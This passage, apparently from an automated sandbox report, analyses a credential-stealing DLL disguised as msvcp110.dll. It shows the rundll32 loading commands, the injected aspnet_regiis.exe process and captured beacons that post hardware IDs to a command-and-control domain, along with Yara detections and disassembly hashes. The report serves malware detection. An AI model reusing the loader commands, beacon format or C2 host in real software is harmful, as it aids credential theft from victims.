2024-10-24 19:59:12 UTC	1249	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 44 33 44 43 38 46 46 37 44 42 43 34 46 31 34 36 34 37 37 37 30 38 38 34 44 43 35 46 33 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7AD3DC8FF7DBC4F14647770884DC5F3B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
2024-10-24 19:59:13 UTC	1011	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:59:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=gcr9fjbdfqc0ec394e38euog2v; expires=Mon, 17 Feb 2025 13:45:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EXmLDe1J19kokJ6m76wL%2FbdKsSsA24c5u0wq%2Fk3yES5fq3dQ7JYvxRVfhq4N4ra9ZTIsl%2FV7w4w5yIWB0x31jxvlijLEvz4VFR7bEiqIrnA%2FwzJr4TFky%2F93Gv4tVsxSrYFw"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c8bc919de6c74-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=987&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=2166&delivery_rate=2973305&cwnd=251&unsent_bytes=0&cid=438b0ac8f80ea5d1&ts=531&x=0"
2024-10-24 19:59:13 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a Data Ascii: 11ok 173.254.250.71
2024-10-24 19:59:13 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.5	49724	188.114.97.3	443	6200	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:59:13 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 115 Host: withdrwblon.cyou
2024-10-24 19:59:13 UTC	115	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f 31 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 37 41 44 33 44 43 38 46 46 37 44 42 43 34 46 31 34 36 34 37 37 37 30 38 38 34 44 43 35 46 33 42 Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--@qjwo1&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=7AD3DC8FF7DBC4F14647770884DC5F3B
2024-10-24 19:59:14 UTC	1010	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:59:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=licapbgsd4u4uic2j27g67589p; expires=Mon, 17 Feb 2025 13:45:52 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5twtTzaC6z6hEKHqBmWUmJl0hmUbS6%2BfSYrApEY0NqNpGP5C7qy1AsIs6RIYDSrS%2B705Rg8yfEvDFf4vzIqOffU1cIhpW1ZQ3Br%2F07YvH2aGeRF%2BNenI4UieA4LN99lwwiSP"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c8bcecbe36bf6-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1065&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1016&delivery_rate=2625566&cwnd=252&unsent_bytes=0&cid=d715f5de9cc4620c&ts=533&x=0"
2024-10-24 19:59:14 UTC	54	IN	Data Raw: 33 30 0d 0a 39 56 7a 74 75 4e 54 44 4c 35 62 71 61 7a 33 67 78 62 33 59 6c 45 43 78 72 61 56 6e 41 56 31 71 30 71 50 59 65 65 45 63 61 2b 79 75 41 51 3d 3d 0d 0a Data Ascii: 309VztuNTDL5bqaz3gxb3YlECxraVnAV1q0qPYeeEca+yuAQ==
2024-10-24 19:59:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.5	49725	188.114.97.3	443	6432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:59:14 UTC	281	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=be85de5ipdocierre1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 1134 Host: withdrwblon.cyou
2024-10-24 19:59:14 UTC	1134	OUT	Data Raw: 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 41 44 33 44 43 38 46 46 37 44 42 43 34 46 31 34 36 34 37 37 37 30 38 38 34 44 43 35 46 33 42 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 62 65 38 35 64 65 35 69 70 64 6f 63 69 65 72 72 65 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f Data Ascii: --be85de5ipdocierre1Content-Disposition: form-data; name="hwid"7AD3DC8FF7DBC4F14647770884DC5F3B--be85de5ipdocierre1Content-Disposition: form-data; name="pid"1--be85de5ipdocierre1Content-Disposition: form-data; name="lid"HpOoIh--@qjwo
2024-10-24 19:59:14 UTC	1008	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:59:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ric4qh5m5t8b5bjfkeh10i7ht1; expires=Mon, 17 Feb 2025 13:45:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=25kvWdTiIN3%2ByEcVoxdSt2C8jZSAruUBwUsz3CI%2BRUlwDps4jNmjzqlJuUzK9F8ZmVgHl2PXV%2Fz6RY7Y5U9IFcPJskHDM4TxMtOsnYQre5Kl5Qd4xxVUO3S059UxUrh8Ckb0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c8bd17d706b07-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1265&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2839&recv_bytes=2051&delivery_rate=2146775&cwnd=251&unsent_bytes=0&cid=0b0692b9ca57ef4c&ts=674&x=0"
2024-10-24 19:59:14 UTC	23	IN	Data Raw: 31 31 0d 0a 6f 6b 20 31 37 33 2e 32 35 34 2e 32 35 30 2e 37 31 0d 0a Data Ascii: 11ok 173.254.250.71
2024-10-24 19:59:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49726	188.114.97.3	443	2316	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:59:14 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 115 Host: withdrwblon.cyou
2024-10-24 19:59:14 UTC	115	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f 31 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 37 41 44 33 44 43 38 46 46 37 44 42 43 34 46 31 34 36 34 37 37 37 30 38 38 34 44 43 35 46 33 42 Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--@qjwo1&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=7AD3DC8FF7DBC4F14647770884DC5F3B
2024-10-24 19:59:14 UTC	1008	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:59:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=6rsal61upu0l4lo7r6ps9kd8eu; expires=Mon, 17 Feb 2025 13:45:53 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6DxA4%2F6Br3Oo784KjGi8mI95LxzuPInRLZG5E867BKSJlkfDzwSwoJkEdVhzPJctvKiNsi1rlZ1UwTp20kdhuxUzW0RX%2FZEabtGMRWqiqHz9KWLwT%2BhajAYMfRd3DGr99pdQ"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c8bd22a772851-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1083&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1016&delivery_rate=2630336&cwnd=250&unsent_bytes=0&cid=f56be62b889b9640&ts=667&x=0"
2024-10-24 19:59:14 UTC	54	IN	Data Raw: 33 30 0d 0a 45 48 31 71 7a 35 63 7a 4c 35 4f 79 38 70 56 4f 72 31 36 6e 47 77 43 6e 32 4d 66 63 71 35 61 43 64 71 64 2f 5a 6b 70 6d 72 62 6c 4c 49 41 3d 3d 0d 0a Data Ascii: 30EH1qz5czL5Oy8pVOr16nGwCn2Mfcq5aCdqd/ZkpmrblLIA==
2024-10-24 19:59:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49727	188.114.97.3	443	6432	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-24 19:59:15 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 115 Host: withdrwblon.cyou
2024-10-24 19:59:15 UTC	115	OUT	Data Raw: 61 63 74 3d 67 65 74 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 48 70 4f 6f 49 68 2d 2d 40 71 6a 77 6f 31 26 6a 3d 62 39 61 62 63 37 36 63 65 35 33 62 36 66 63 33 61 30 33 35 36 36 66 38 66 37 36 34 66 35 65 61 26 68 77 69 64 3d 37 41 44 33 44 43 38 46 46 37 44 42 43 34 46 31 34 36 34 37 37 37 30 38 38 34 44 43 35 46 33 42 Data Ascii: act=get_message&ver=4.0&lid=HpOoIh--@qjwo1&j=b9abc76ce53b6fc3a03566f8f764f5ea&hwid=7AD3DC8FF7DBC4F14647770884DC5F3B
2024-10-24 19:59:15 UTC	1015	IN	HTTP/1.1 200 OK Date: Thu, 24 Oct 2024 19:59:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=on6gb4cr8q0vhihrmop13f8eof; expires=Mon, 17 Feb 2025 13:45:54 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2bJ9brB2kiaiD%2BX5tRMLaZM3mtqNg6FcFgJK9v0QB%2BXEb1otkjNx8Q7TFQrpiGi1LwQ00iOiKt4dY%2FS18m8xC%2FshBPb%2FEMcUpnHu8wCBYCb8TdY%2FmLvkbuSimO9RZUOvm0r%2F"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d7c8bd94b727bdc-ATL alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=20884&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1016&delivery_rate=139030&cwnd=32&unsent_bytes=0&cid=d659f33b7bccac6f&ts=496&x=0"
2024-10-24 19:59:15 UTC	54	IN	Data Raw: 33 30 0d 0a 33 4b 72 76 52 6d 76 6c 56 37 53 41 4f 79 54 68 53 63 2f 53 51 2f 37 69 65 39 51 7a 2b 5a 78 6f 61 52 45 59 67 34 64 42 35 44 71 48 39 77 3d 3d 0d 0a Data Ascii: 303KrvRmvlV7SAOyThSc/SQ/7ie9Qz+ZxoaREYg4dB5DqH9w==
2024-10-24 19:59:15 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	15:58:59
Start date:	24/10/2024
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\msvcp110.dll"
Imagebase:	0xe30000
File size:	126'464 bytes
MD5 hash:	51E6071F9CBA48E79F10C84515AAE618
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	15:58:59
Start date:	24/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	15:58:59
Start date:	24/10/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\msvcp110.dll",#1
Imagebase:	0x790000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	15:58:59
Start date:	24/10/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\msvcp110.dll,GetGameData
Imagebase:	0x4c0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	15:58:59
Start date:	24/10/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\msvcp110.dll",#1
Imagebase:	0x4c0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:59:00
Start date:	24/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Imagebase:	0x740000
File size:	43'016 bytes
MD5 hash:	5D1D74198D75640E889F0A577BBF31FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	15:59:00
Start date:	24/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Imagebase:	0x740000
File size:	43'016 bytes
MD5 hash:	5D1D74198D75640E889F0A577BBF31FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000003.2120852736.00000000028A2000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	15:59:02
Start date:	24/10/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\msvcp110.dll",GetGameData
Imagebase:	0x4c0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	15:59:03
Start date:	24/10/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
Imagebase:	0x740000
File size:	43'016 bytes
MD5 hash:	5D1D74198D75640E889F0A577BBF31FC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2154600497.0000000002A74000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2154648334.0000000002A6B000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000009.00000003.2154718277.0000000002A6E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Function 02C3FF7F Relevance: 2.6, Instructions: 2603COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.2176086224.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, Offset: 02C37000, based on PE: false

Associated: 00000005.00000003.2122584153.0000000002C37000.00000004.00000020.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2c37000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3173e7f6f08faa5bc319a23a447b486e72f68f6c94da4fd792a208040492af4f
Instruction ID: 51f11cb74eed9e4ed474b9fb9424df70ed1a5d72916bb6d2d2e4e38655d76ae8
Opcode Fuzzy Hash: 3173e7f6f08faa5bc319a23a447b486e72f68f6c94da4fd792a208040492af4f
Instruction Fuzzy Hash: FB13785154A1E68FD742AFB888AA2D6BFF1DE5762031C0AC5C9C4CF063F659889FC391

Function 02C3FF7F Relevance: 2.6, Instructions: 2603COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000003.2176086224.0000000002C38000.00000004.00000020.00020000.00000000.sdmp, Offset: 02C38000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_3_2c37000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3173e7f6f08faa5bc319a23a447b486e72f68f6c94da4fd792a208040492af4f
Instruction ID: 51f11cb74eed9e4ed474b9fb9424df70ed1a5d72916bb6d2d2e4e38655d76ae8
Opcode Fuzzy Hash: 3173e7f6f08faa5bc319a23a447b486e72f68f6c94da4fd792a208040492af4f
Instruction Fuzzy Hash: FB13785154A1E68FD742AFB888AA2D6BFF1DE5762031C0AC5C9C4CF063F659889FC391

Analysis Process: aspnet_regiis.exePID: 2316, Parent PID: 4088COMMON

Execution Graph

Execution Coverage:	6.6%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	41.6%
Total number of Nodes:	245
Total number of Limit Nodes:	20

Executed Functions

Function 75A7EC20 Relevance: 20.4, Strings: 16, Instructions: 397
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

O9M;, xrefs: 75A7ED3F
6E+G, xrefs: 75A7ED57
5Q<S, xrefs: 75A7ED6F
7U9W, xrefs: 75A7ED77
<Y?[, xrefs: 75A7ED7F
E-A/, xrefs: 75A7ED27
8]S_, xrefs: 75A7ED87
dc, xrefs: 75A7EDC0
>M"O, xrefs: 75A7ED67
I)^+, xrefs: 75A7ED1F
M%E', xrefs: 75A7ED17
eI?K, xrefs: 75A7ED5F
jabc, xrefs: 75A7ED8F
&A-C, xrefs: 75A7ED4F
6, xrefs: 75A7EE5D
P!N#, xrefs: 75A7ED0F

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: &A-C$5Q<S$6$6E+G$7U9W$8]S_$<Y?[$>M"O$E-A/$I)^+$M%E'$O9M;$P!N#$dc$eI?K$jabc
API String ID: 0-600622405
Opcode ID: 9c5f72caf1f9e45963659ed1d88abc86751812f8c77c2f0654faf81aa1376332
Instruction ID: 733aceedf3c8e06ebd0fcde90f64a62f9a8709ce64ccd84a3d3cb586f1a74119
Opcode Fuzzy Hash: 9c5f72caf1f9e45963659ed1d88abc86751812f8c77c2f0654faf81aa1376332
Instruction Fuzzy Hash: 3DD1037160C3918FC314CF24D890B9BBBE2ABD5254F188D3DE8E64B355D7758A0ACB92

Function 75A979B0 Relevance: 12.8, APIs: 1, Strings: 6, Instructions: 506
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Mx, xrefs: 75A97E14
qVw, xrefs: 75A97F66
Dw, xrefs: 75A97CAF
wE, xrefs: 75A97E0C
n~, xrefs: 75A97C97
DG, xrefs: 75A97C9F

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: DG$Dw$Mx$n~$wE$qVw
API String ID: 0-1111290910
Opcode ID: d565c98fec8dd3fa1fdb0091026dafb454fe9ea1bdaec00ef3037b5977664fc1
Instruction ID: e81b1da183d8ccc357288278789ced0f13b52c5ee8ded8c9282f0161640e2e83
Opcode Fuzzy Hash: d565c98fec8dd3fa1fdb0091026dafb454fe9ea1bdaec00ef3037b5977664fc1
Instruction Fuzzy Hash: E0F1CBB16183408FD304CF25D890A6FBBF5EF96354F14892CF8968B395E7788906CB96

Function 75A7CF90 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 186
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThreadId.KERNEL32 ref: 75A7D096
ShellExecuteW.SHELL32(00000000,?,75AB8050,?,00000000,00000005), ref: 75A7D196
GetForegroundWindow.USER32(?,00000000,00000005), ref: 75A7D19C
GetCurrentProcessId.KERNEL32(?,00000000,00000005), ref: 75A7D1A6
ExitProcess.KERNEL32 ref: 75A7D1C6

Strings

89, xrefs: 75A7D13F

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

API ID: CurrentProcess$ExecuteExitForegroundShellThreadWindow
String ID: 89
API String ID: 1013327911-155395596
Opcode ID: eaba7ad985a2f7830795d436c4f65b59daaafe64ff9ccd6450b2d909ff0388eb
Instruction ID: 9cc40e2ecd2370d24feffc5e6b055763e7fa1c1ecb9280a0c30b66ef920a097e
Opcode Fuzzy Hash: eaba7ad985a2f7830795d436c4f65b59daaafe64ff9ccd6450b2d909ff0388eb
Instruction Fuzzy Hash: E5518A327187501BE3089A34CC55B6FBBD2EB86314F148D3CD8D3EB2C5DA6C88058792

Function 75AABB70 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 78
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(75AB7AA8,00000000,00000001,75AB7A98,00000000), ref: 75AABC97

Strings

:, xrefs: 75AABC4D
r}, xrefs: 75AABBAB
x, xrefs: 75AABB9B
s", xrefs: 75AABBA3

Memory Dump Source

Source File: 00000007.00000002.2183162151.0000000075A71000.00000020.00000400.00020000.00000000.sdmp, Offset: 75A70000, based on PE: true

Associated: 00000007.00000002.2183134611.0000000075A70000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183214584.0000000075AB6000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183241815.0000000075AB9000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000007.00000002.2183271613.0000000075AC9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_75a70000_aspnet_regiis.jbxd

Similarity

